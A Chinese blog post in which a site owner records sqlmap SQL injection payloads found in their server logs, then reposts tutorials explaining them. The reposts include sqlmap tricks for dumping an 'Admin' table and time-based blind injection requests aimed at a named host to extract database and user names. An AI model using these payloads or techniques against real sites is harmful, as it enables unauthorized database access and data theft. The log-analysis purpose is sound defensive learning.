网站被攻击扫描SQL注入的日常记录
我发了个博客,泄露了域名之后,便有人疯狂的尝试攻击我的站点,奈何我防守做得比较好,直接把网段封了,看到403还锲而不舍,我真是想给他颁奖了
查看ua,发现很多sqlmap的ua,肯定会是被刷了,只是运气比较好,没突破防守
SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。
日志记录里边出现这条,经过查阅,是注入攻击
%29%3BSELECT%20PG_SLEEP%285%29
原文在这里
https://www.jianshu.com/p/267965649779
下一条
%28SELECT%20CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28107%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%288745%3D8745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%29
相关资料在
原文在https://www.cnblogs.com/milantgh/p/4908812.html
发布者
sqlmap注入检测经验0x01 某日偶遇一SQLInjection Point,MSSQL 2008,已开启显错模式。 马上扔进SQLMap跑,一路顺畅,竟然还是SA的权限,心想运气真好,无论如何都拿定了。 数据库,表,列都列出来了,但是上–dump参数就死活跑不出来。 报错 “unable to retrieve the number of entries for table ‘Admin’ in database ‘2012_xxxx’”——x是马赛克哈:) 心想应该很容易搞定,遂查找手工注入方法,测试无果。 还是回到SQLMap,-h查看帮助,发现-v 参数可以指定输出详细度,开到-v 3,发现显示了payload,一不做二不休,直接开到-v 5,发现提供了整个http请求,怪不得报错,原来都是返回500,用firefox打开完整payload,说是语法错误。 Xhttp://www.xxxx.cn/xxx/detail.aspx?id=218%20AND%204416%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28115%29%2BCHAR%28119%29%2BCHAR%28100%29%2BCHAR%28113%29%2B%28SELECT%20ISNULL%28CAST%28COUNT%28*%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20%222012_xxxx%22..syscolumns%2C2012_xxxx..sysobjects%20WHERE%202012_xxxx..syscolumns.id%3D2012_xxxx..sysobjects.id%20AND%202012_xxxx..sysobjects.name%3DCHAR%2884%29%2BCHAR%2866%29%2BCHAR%2895%29%2BCHAR%2865%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%28105%29%2BCHAR%28110%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28104%29%2BCHAR%28113%29%29%29 显然是2012的问题,也就是应该是错把库名中的数字错当成参数了 在URL的库名加上双引号包裹,果然就可以爆出数据了。 问题又来了,要我手工爆数据我可搞不定,还是要回到SQLMap啊,意思是要想办法把库名包裹起来,不让系统把它解析成一个参数 XTEST1: ./sqlmap.py -u http://www.xxxx.cn/xxxx/detail.aspx?id=218 –dump -D”‘2012_xxxx” -T’Admin’ 这次好一点了,还是报错unable to retrieve column names for table ‘Admin’ in database ‘”2012_xxxx”‘,意思是有返回了,但是库名不对。 XTEST12 ./sqlmap.py -u http://www.xxxx.cn/broadband/detail.aspx?id=218 –dump -D”[2012_xxxx]” -T’Admin’ 我也不记得哪来的灵机一动,改用中括号包裹,果然就成功了,dump出整个表了。 XCONCLUSION:在使用SQLMap时可以使用-v参数指定输出详细度,然后直接用浏览器查看payload,确定语法错误点后想办法改进。在遇到系统误判库名表名是可用中括号包裹名字。为避免原文删除,所以搬过来了
下一条
%28SELECT%20%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28107%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282244%3D2244%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%29
下一条
%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27XsDx%27%3D%27XsDx
原文地址http://www.91ri.org/4732.html
注入的基础知识就不说的了,只是在这里做个简单的笔记,以便之后拿起了就用。
Default POST /card.aspx HTTP/1.1 Content-Length: 96 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Cookie: ASP.NET_SessionId=2k32d0nwvrzpbg55qucudt3b Host: www.cunlide.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27%3b%20waitfor%20delay%20%270%3a0%3a5%27%20--%20
| 1 2 3 4 5 6 7 8 9 10 11 12 | POST / card . aspx HTTP / 1.1 Content - Length : 96 Content - Type : application / x - www - form - urlencoded X - Requested - With : XMLHttpRequest Cookie : ASP . NET_SessionId = 2k32d0nwvrzpbg55qucudt3b Host : www . cunlide . com Connection : Keep - alive Accept - Encoding : gzip , deflate User - Agent : Mozilla / 5.0 ( compatible ; MSIE 9.0 ; Windows NT 6.1 ; WOW64 ; Trident / 5.0 ) Accept : * / * cardid = 1 & amp ; cardpwd = 1 & amp ; Submit2 = 1 & amp ; username = pxnjodhe % 27 % 3b % 20waitfor % 20delay % 20 % 270 % 3a0 % 3a5 % 27 % 20 -- % 20 |
看POST数据,注入是发生在username这里。把username的值URL解码下这样比较清楚点。
Default pxnjodhe%27%3b%20waitfor%20delay%20%270%3a0%3a5%27%20--%20 pxnjodhe'; waitfor delay '0:0:5' --
| 1 2 3 | pxnjodhe % 27 % 3b % 20waitfor % 20delay % 20 % 270 % 3a0 % 3a5 % 27 % 20 -- % 20 pxnjodhe '; waitfor delay ' 0 : 0 : 5' -- |
因为延时注入是通过页面返回的时间来判断的,所以当我进行猜解的时候也就是用时间来进行猜解,比如我们可以取出db_name的第一个字符,先转换 成ASCII在和数字进行比较(推荐使用<、>),在比较时我们可以用折半法,比如我们先猜解第一个字符是大写字母还是小写字母,就可以用 91来做个标准小于91的为大写字母(A-F,或许是_ 、-),大于则反。
下面两个语句为例子:
Default cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27;if%20(0%3D(SELECT%20IS_MEMBER ('db_owner')))%20waitfor%20delay%20%270:0:11%27%20--%20 //判断权限 cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27;if(ascii(substring(db_name(),1,1)))>40%20waitfor%20delay%20%270:0:2%27%20--%20 //数据库名 cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27;if(ascii(substring(user_name(),1,1)))>115%20waitfor%20delay%20%270:0:1%27%20--%20 //用户名
| 1 2 3 4 5 6 | cardid = 1 & amp ; cardpwd = 1 & amp ; Submit2 = 1 & amp ; username = pxnjodhe % 27 ; if % 20 ( 0 % 3D ( SELECT % 20IS_MEMBER ( 'db_owner' ) ) ) % 20waitfor % 20delay % 20 % 270 : 0 : 11 % 27 % 20 -- % 20 //判断权限 cardid = 1 & amp ; cardpwd = 1 & amp ; Submit2 = 1 & amp ; username = pxnjodhe % 27 ; if ( ascii ( substring ( db_name ( ) , 1 , 1 ) ) ) & gt ; 40 % 20waitfor % 20delay % 20 % 270 : 0 : 2 % 27 % 20 -- % 20 //数据库名 cardid = 1 & amp ; cardpwd = 1 & amp ; Submit2 = 1 & amp ; username = pxnjodhe % 27 ; if ( ascii ( substring ( user_name ( ) , 1 , 1 ) ) ) & gt ; 115 % 20waitfor % 20delay % 20 % 270 : 0 : 1 % 27 % 20 -- % 20 //用户名 |
建议用时但编码状态出问题时,可以试试未编码状态。
原文没有图,防止失效,搬过来下一条
%20UNION%20ALL%20SELECT%20NULL%2CNULL
这个查询结果就很多了,不再把文章拿过来
更多精彩
